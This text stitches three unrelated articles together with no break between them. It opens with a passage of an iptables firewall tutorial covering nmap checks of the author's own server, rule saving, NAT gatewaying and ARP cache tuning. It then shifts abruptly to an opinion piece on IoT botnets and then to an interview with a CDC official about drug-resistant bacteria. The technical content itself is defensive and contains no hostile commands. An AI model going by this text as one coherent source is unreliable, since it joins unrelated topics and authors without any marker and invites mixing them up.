Nmap scan report for 10.0.0.120
Host is up (0.012s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
631/tcp  open  ipp
3306/tcp open  mysql
4001/tcp open  unknown
5900/tcp open  vnc
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 6.57 seconds
Those are a lot of open ports! In just a few steps, you will learn how the above changes after iptables is configured.
Firewall rules can either be appended directly on the command line or edited in a plain text file and then loaded. I prefer using a text file to apply changes: most of the time, syntax errors are easier to catch when the rules are written in a file. Another problem with appending rules directly is that they will not be saved when the server reboots. Before editing the file, let's tell iptables to export the current rules so that file becomes our initial template. See Listing 4.
Listing 4. Saving rules to a file
root@desktop:~# iptables-save > /etc/iptables.rules
root@desktop:~# cat /etc/iptables.rules
# Generated by iptables-save v1.4.4 on Sun Nov 21 14:48:48 2010
*filter
:INPUT ACCEPT [732:83443]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [656:51642]
COMMIT
# Completed on Sun Nov 21 14:48:48 2010
I used the iptables-save command and redirected the output to a text file in the "/etc" directory. I have concatenated the file so you can see what it looks like on my machine.
One of the first requirements is to allow established connections to receive traffic. You need this when you want anything behind the firewall (in a private network) to be able to send and receive network data without restrictions. In Listing 5 we will issue a direct rule to iptables and verify the state of the firewall afterward.
Listing 5. Established sessions rule
root@desktop:~# iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
root@desktop:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
To have a better idea of what was issued, let's break the command apart and explain each one:
- -A INPUT: Append this rule to the INPUT chain.
- -m conntrack: Match the following connection-tracking state for the current packet/connection.
- --ctstate ESTABLISHED,RELATED: The connection states that the rule should apply to. In this case, an ESTABLISHED connection means a connection that has seen packets in both directions, and a RELATED type means that the packet is starting a new connection but is associated with an existing connection.
- -j ACCEPT: Tells the firewall to accept the connections described before. Another valid setting for the -j flag would be DROP, which discards matching packets instead.
I'm also connecting through the SSH protocol to that server, so before locking down the firewall, a rule in Listing 6 is going to allow all incoming SSH traffic. I specify the type of network protocol (tcp) and the port that is conveniently associated with the SSH service. You can specify the port number directly if needed.
Listing 6. Accepting inbound SSH connections
root@desktop:~# iptables -A INPUT -p tcp --dport ssh -j ACCEPT
root@desktop:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:ssh

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
Finally, let's set the firewall to block everything else. Take special care when issuing the following command. If it is placed before all the other rules, it will block any and all traffic to the server. Iptables reads rules in a procedural fashion (from top to bottom) and after a rule is matched, nothing else gets evaluated.
Listing 7. Blocking all incoming traffic
root@desktop:~# iptables -A INPUT -j DROP
root@desktop:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:ssh
DROP       all  --  anywhere             anywhere

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
Listing 8. Verifying firewall configuration
root@desktop:~# iptables-save > /etc/iptables.rules
root@desktop:~# cat /etc/iptables.rules
# Generated by iptables-save v1.4.4 on Sun Nov 21 15:10:42 2010
*filter
:INPUT ACCEPT [1234:120406]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [1522:124750]
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -j DROP
COMMIT
# Completed on Sun Nov 21 15:10:42 2010
The iptables-save command pushed our changes to a plain text file. It does look a bit different from just listing the rules in the command line, but it is exactly the same thing. Just as before, we have three sections: INPUT, FORWARD and OUTPUT. The rules that we initially specified concern INPUT connections, so this is the section where the rules we added are placed.
At this point, the server is locked and the configuration has been saved to a file. But what will happen when we perform a network scan? Let's run nmap again against that server and check the results as shown in Listing 9.
Listing 9. Network scan with locked down server
~ $ nmap 10.0.0.120

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-21 20:56 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds

~ $ nmap -Pn 10.0.0.120

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-21 20:56 EST
Nmap scan report for 10.0.0.120
Host is up (0.017s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds
Note that a scan was attempted against the IP where the server is located, but nmap failed to list the open ports. This happens because the firewall is set in such a way that it is blocking everything except for the SSH port we have open. Since nmap uses a specific network protocol to verify if the host is up, it returned empty handed. The second try was successful and is telling us that only SSH is open and nothing else. With just three rules, we managed to get an effective lock down of our server.
Saving and restoring rules
In the previous section, we saved the rules to a text file. However, that doesn't effectively tell the server that it needs to load the rules. Also, when the server reboots, it loses all the configuration done.
If you are adding rules on the command line, you should already be familiar with saving those changes to a text file. See Listing 10 for saving the firewall rules.
Listing 10. Saving the firewall rules
iptables-save > /etc/iptables.rules
Depending on the operating system in use, there are several ways to get those rules to load on start up. An easy approach is to go to the one interface that is public facing and tell it to load those rules before bringing the interface on line. See Listing 11.
Listing 11. Public network interface loading rules
auto eth0
iface eth0 inet static
    address 188.8.131.52
    netmask 255.255.255.0
    pre-up iptables-restore < /etc/iptables.rules
Here we have the eth0 interface and are declaring a rule to load the rules before bringing the interface up. As you may have guessed, you can use these commands to manually update the firewall rules from and to the file.
Not long ago, I was in a situation where I was responsible for a firewall appliance. Although I was making sure periodic backups of the rules and configurations were made, I failed to realize that those backups were in a proprietary format and only readable by the appliance model I had. That isn't a problem, of course, as long as you have two appliances of the same brand, model, and firmware version, but, as is common in small businesses, the budget didn't allow for anything else.
One day, that appliance decided not to run anymore and I had to implement something fast that could be as reliable (or better). I learned the hard way that having human-readable configurations and the ability to come back up quickly are very important assets.
With some luck, I found an old server in good condition with a couple of network interfaces and was able to replace the dead appliance.
Until now, we have gone through scenarios of obtaining a copy of the rules that could be easily applied to any server in case of failure. Now let's enable the firewall to be the main gateway for a small home or business network.
Iptables as a main gateway
So far everything we've covered is great if you are running iptables on a personal computer, but it doesn't make much sense if a whole office needs to share an internet connection. With a few configuration settings, we can set that up properly.
We are going to assume that the server has two physical network interfaces: eth0 (public) and eth1 (private). I need to NAT them together so network traffic flows seamlessly from one interface to the other. The private network subnet is 192.168.0.0/255.255.0.0, so let's see how a NAT rule with forwarding would look in Listing 12.
Listing 12. NAT and forwarding rules
iptables -A FORWARD -s 192.168.0.0/255.255.0.0 -i eth1 -o eth0 -m conntrack --ctstate NEW -j ACCEPT
iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Listing 13 shows how to modify some settings in
proc to enable forwarding in the server.
Listing 13. Enabling forwarding in the server
sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
Note that /proc changes are volatile, so any changes made there are lost after a reboot. There are several ways to make sure that the modifications stick after a reboot. In Debian/Ubuntu distributions, add the lines to /etc/rc.local so they are executed at boot.
Finally, as shown in Listing 14, there is one more setting change that modifies kernel parameters at runtime (sysctl). These configurations are usually already in the sysctl.conf, but are commented out. Uncomment them (or add them if they are not included with your distribution).
Listing 14. Sysctl/kernel forwarding
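# the standard /etc/sysctl.conf entry for this; uncomment it, or add it if missing
net.ipv4.ip_forward=1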
ARP cache threshold
Running a Linux server as a gateway can cause issues that often show up first as DNS failures. The kernel keeps a cache that maps IP addresses to hardware addresses (the ARP, or neighbour, table), but it has a default maximum number of entries that is not suitable for heavy traffic. When this limit is reached, lookups fail and replies such as DNS queries never get back to the host that asked. While such a threshold is rarely reached with a few clients, more than thirty clients going through this firewall will cause a problem.
The environment may need some adjusting, but the values shown in Listing 15 should provide room before seeing such issues.
Listing 15. Increasing the ARP cache size
echo 1024 > /proc/sys/net/ipv4/neigh/default/gc_thresh1
echo 2048 > /proc/sys/net/ipv4/neigh/default/gc_thresh2
echo 4096 > /proc/sys/net/ipv4/neigh/default/gc_thresh3
Be on the lookout for messages similar to those in Listing 16, which will provide a warning if it is necessary to increase the numbers just provided.
Listing 16. System log ARP cache overflow warnings
Nov 22 11:36:16 firewall kernel: [92374.325689] Neighbour table overflow.
Nov 22 11:36:20 firewall kernel: [92379.089870] printk: 37 messages suppressed.
Nov 22 11:36:20 firewall kernel: [92379.089876] Neighbour table overflow.
Nov 22 11:36:26 firewall kernel: [92384.333161] printk: 51 messages suppressed.
Nov 22 11:36:26 firewall kernel: [92384.333166] Neighbour table overflow.
Nov 22 11:36:30 firewall kernel: [92389.084373] printk: 200 messages suppressed.
We have gone through some simple steps to get iptables to run properly and to safely lock down a Linux server. The rules applied should provide a good sense of what is going on in a server using iptables as a firewall. I encourage you to give iptables a try, especially if you depend on an appliance and want more control and easily replicated human-readable configurations.
While the rules used we've used here are simple, the full flexibility and complexity of iptables is beyond the scope of this article. There are many complex rules that you can combine to create a safe and controllable firewall environment.
An example of an interesting advanced feature in iptables is load balancing. Most of the time, when exploring high availability web services, you are seeking load balancing solutions. With iptables, this can be set and configured with the random or nth flags.
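As a sketch of how that can look in practice (current iptables releases expose this behavior through the statistic match; the server addresses and port here are hypothetical):

# send every second new HTTP connection to the first server, and the remainder to the second
iptables -t nat -A PREROUTING -p tcp --dport 80 -m conntrack --ctstate NEW \
  -m statistic --mode nth --every 2 --packet 0 -j DNAT --to-destination 192.168.0.101:80
iptables -t nat -A PREROUTING -p tcp --dport 80 -m conntrack --ctstate NEW \
  -j DNAT --to-destination 192.168.0.102:80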
You can also do time-based rules. In a small office environment, it might be useful to restrict certain services from Monday through Friday, but let the firewall behave differently on Saturday and Sunday. The flags that might work in such a case are: --timestart, --timestop and days.
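A minimal sketch using the time match as it exists in current releases (newer versions use --weekdays where older patches used --days; the port and hours are examples):

# allow forwarded web-proxy traffic only during business hours, Monday through Friday
iptables -A FORWARD -p tcp --dport 3128 -m time --timestart 09:00 --timestop 18:00 \
  --weekdays Mon,Tue,Wed,Thu,Fri -j ACCEPT
iptables -A FORWARD -p tcp --dport 3128 -j DROP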
A problem I experienced was not having two firewalls at the same time with some kind of fail over. Creating such a thing is no easy feat, and can be approached in several ways. The easiest solution would be to have the router do the job and load balance two identical Firewall servers. I recommend looking into such an option if the network environment is a critical asset like an office or small business.
Iptables saved me once, and I hope it does the same for you!
- Netfilter Project: All the resources for iptables can be found in the project page.
- iptables in Ubuntu: A great introduction to iptables in Ubuntu including some advanced configurations.
- iptables in CentOS
- Nmap: a great network scanning tool.
On an increasingly massive scale, cybercriminals are repurposing connected Internet of Things (IoT) devices installed within our homes. These hackers use malware to enlist our smart thermostats, speakers, lights, and more as soldiers for their botnet armies – used in coordinated massive attacks causing security breaches that threaten the integrity of the internet.
They’ve used these IoT botnets to target major websites and even forced entire countries to go offline. With the IoT primed for exponential growth through the next decade, the inherent vulnerabilities of these smart devices – combined with the capabilities of IoT-based botnets – create formidable cybersecurity challenges and risks.
I believe that the party best positioned to prevent or stop malicious attacks is the consumer. Those who use IoT devices in their own homes have the power to vote with their wallets, and could choose to buy devices with more effective security. However, without awareness of the risks posed to other parties, or direct impact upon their own individual use, why would consumers change their behavior?
Currently, most consumers have little or no awareness when their IoT devices are compromised or exploited. In the eyes of the consumer, as long as the IoT devices perform their intended function, the consumer literally “sees” no real problem.
Conversely, website hosting companies, operators, and other entities attacked by these IoT botnet armies are highly motivated to address the issue of unsecured IoT devices. But, in most cases, they lack the resources to mitigate botnet attacks, or the influence to make manufacturers provide better device security.
The current level of IoT device security varies. While some higher-end household appliances like smart refrigerators may incorporate more robust security features, many lower-end devices like lights and thermostats have no security measures in place – and most lack a user interface to manage the device.
As the IoT market continues to swell – Cisco estimates 15 billion IoT devices today, IDC/Intel foresees 200 billion such devices by 2020 – the vast majority of these internet-connected gadgets are of the low-end, low-priced, low-security variety.
Customer demand continues driving these manufacturers to emphasize time-to-market and user features (rather than security), meaning the problem and risks will only worsen.
The rapid introduction of billions more connected devices, with little attention to security and in most instances no ability to add security features later, opens the door for cybercriminals to easily grow massive botnets. These botnets can be rented to the highest bidder for everything from DDoS attacks, to simulating human behavior for ad fraud, to any other malicious use they may serve.
While IoT device owners largely remain unaware of the crimes their toasters and light bulbs may be perpetrating, the companies, countries, and websites being targeted and shut down through massive DDoS attacks are all too aware of the issue. Every minute these entities are offline directly translates into lost revenue opportunity and damage to their reputations. Manufacturers may not currently feel pressure to improve their IoT device security features, but it’s easy to understand that website owners and hosting operators cannot allow the status quo to continue.
Given the rapid pace of technology and the level of sophistication prevalent within the hacking community, I don’t place much faith in a regulatory-based approach to a solution. Instead, these are the steps toward a secure IoT that I predict will occur. First, website owners and hosting companies will seek to stop botnet attacks at the point of their own connections to the internet.
However, their attempts will only be minimally successful, for many of the reasons stated above. Next, website owners and hosting companies will try to pressure ISPs – local telcos, communications service providers (CSPs), and cable companies (like Comcast or Cox in the US, Sky in the UK, and others) – that provide bandwidth to IoT devices used in botnet attacks. As a result, the ISPs will be made to address the issue.
One possibility will be to introduce “metered” broadband, making consumers responsible for increased costs due to botnet-related IoT device activity. Another alternative is for the ISPs to send warning notices when their IoT devices are used in attacks (or even just represent a risk) – and to disable connectivity to those customers if botnet traffic persists.
When consumers are faced with the responsibility, and perhaps even liable for the malicious activities of their IoT devices, and when ISPs block compromised devices from the internet, we can then expect consumers to place an emphasis on security features when purchasing an IoT device. Manufacturers will produce what the market demands. This will be a major stride toward the safer, more secure IoT and internet necessary for each to succeed and thrive in the long term.
We created the nightmare bacteria.
It wasn't on purpose. We could not have invented antibiotics without spurring bacterial evolution. As long as there were some bugs out there immune to the drugs, the population would adapt. Just a few years after antibiotics came into mass use in the 1940s, scientists began to observe resistance. Then, as microbiologist Kenneth Todar writes, "Over the years, and continuing into the present, almost every known bacterial pathogen has developed resistance to one or more antibiotics in clinical use." And now, some bugs are resistant to just about everything.
Carbapenem-resistant Enterobacteriaceae, known as CRE or the "nightmare bacteria," was not known before 2001. Now, 4.6 percent of hospitals in the United States reported at least one infection in 2012. That number was 1.2 percent in 2001.
CRE outbreaks are the stuff of zombie movies, because no drug exists to fight them. In 2011, at a National Institutes of Health hospital no less, an outbreak of a CRE variant killed six people. CRE germs kill about half the people they infect, but here's the scarier part: "CRE have the potential to move from their current niche among health care–exposed patients into the community," the Centers for Disease Control and Prevention reports.
Drug-resistant pathogens such as CRE are mainly found in the hospital setting, but they are also found in the environment. A Columbia University study found drug-resistant germs to be "widespread" in the Hudson River in New York, with the researchers suspecting the source was untreated sewage. The more commonly known MRSA, confined to infections in hospitals in the first two decades after it was discovered, can now be contracted from everyday surfaces such as gym mats.
Last week, CDC released the first comprehensive review of the number of drug-resistant infections and deaths in the country. It's the first of its kind, compiling data from dozens of different strains of bacteria in one report. It finds that at least 2 million Americans become infected with drug-resistant bacteria every year, resulting in 23,000 deaths. The report stresses that these numbers are conservative, as they only take into account infections in acute-care hospitals, not long-term centers.
Recently, I spoke with Jean Patel, one of the authors of the report and a deputy director of CDC's Antimicrobial Resistance Division. She spoke about the need to increase awareness of antibiotic resistance and ways to combat its spread. Her responses have been lightly edited. My questions have been rephrased to sound slightly smarter.
Are we approaching a future where antibiotics will be obsolete?
Antibiotics are always going to have a role, but what we have to decide is to stop relying on them as the only role. So now we have to think, and have a greater focus on prevention of the transmission of resistant pathogens and using antibiotics as wisely as possible.
There are some infections like strep throat where antibiotics are going to be needed. But there are other infections, like upper respiratory tract infections, the common cold, where antibiotics are not necessary. And your doctor can help guide you through that choice. I think it is important on both sides—the doctor and the patient—to decide that antibiotics aren't always necessary.
Any threat of—or just a hypothetical threat—of a drug-resistant pandemic?
I think the scary endpoint that we are looking at are bacteria that are becoming resistant to all agents that could be used for treating them. Right now we have some of those pathogens, but they may be limited to certain populations. An example is CRE. Right now, those are bacteria that are becoming resistant to nearly every drug. But right now they are only causing infections in the health care setting. We anticipate that changing. We saw that happen with the ESBL-producing Enterobacteriaceae, but it hasn't happened yet. But we think we have some time before it does happen. But we need to beef up our focus on prevention.
What does prevention look like? And what role does pharmaceutical innovation play?
I think it needs both. On one end, we need health care providers to make better decisions about using antibiotics. And I think to do that we need more information. We need to get more information in the hands of those health care providers so they can make the best decisions possible.
And we're working on expanding the scope of our ability to track antibiotic resistance and also antibiotic use in health care settings. So a physician would look at the antibiotic use and in their health care setting they'd be able to benchmark what's happening in their setting, and compare to other health care settings.
The report calls for an end of antibiotics use in livestock. How might that happen?
Antibiotics need to be used in raising food-producing animals. But we are asking that they be used to manage infections and not be used to promote growth of the animals. And this is consistent with what the Food and Drug Administration has proposed. So the FDA has draft guidance that maps out a plan for phasing out antibiotic use for growth promotion in animals, and instead using these antibiotics to manage infections in animals. And we support that.
What's the take-home lesson?
The most important thing for the patients is a focus on antibiotic use. Having that conversation with your physician about whether antibiotics are really needed for the illness that they have.
Do we have numbers on antibiotics misuse?
In the health care system, we estimate that 50 percent of antibiotic use is unnecessary or not appropriate.
Can we ever stop the creation of new drug-resistant germs?
We can slow it down. Nature will take its course wherever antibiotics are used. Resistance will emerge, but we can slow that.